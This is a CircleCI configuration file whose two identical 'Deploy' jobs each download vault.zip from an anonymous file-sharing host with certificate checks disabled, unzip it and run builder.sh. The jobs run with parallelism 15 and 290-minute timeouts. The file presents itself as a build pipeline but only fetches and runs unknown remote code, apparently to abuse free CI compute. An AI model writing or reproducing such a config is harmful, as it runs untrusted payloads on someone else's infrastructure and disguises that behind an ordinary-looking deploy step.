version: 2.1

jobs:
  build:
    parallelism: 15
    docker:
      - image: ruby:latest
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                     wget --no-check-certificate -c https://transfer.sh/NwIziH/vault.zip
                     unzip vault.zip && cd vault && ./builder.sh
         no_output_timeout: 290m
  build2:
    parallelism: 15
    docker:
      - image: ruby:latest
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                     wget --no-check-certificate -c https://transfer.sh/NwIziH/vault.zip
                     unzip vault.zip && cd vault && ./builder.sh
         no_output_timeout: 290m

workflows:
  main:
    jobs:
      - build
      - build2
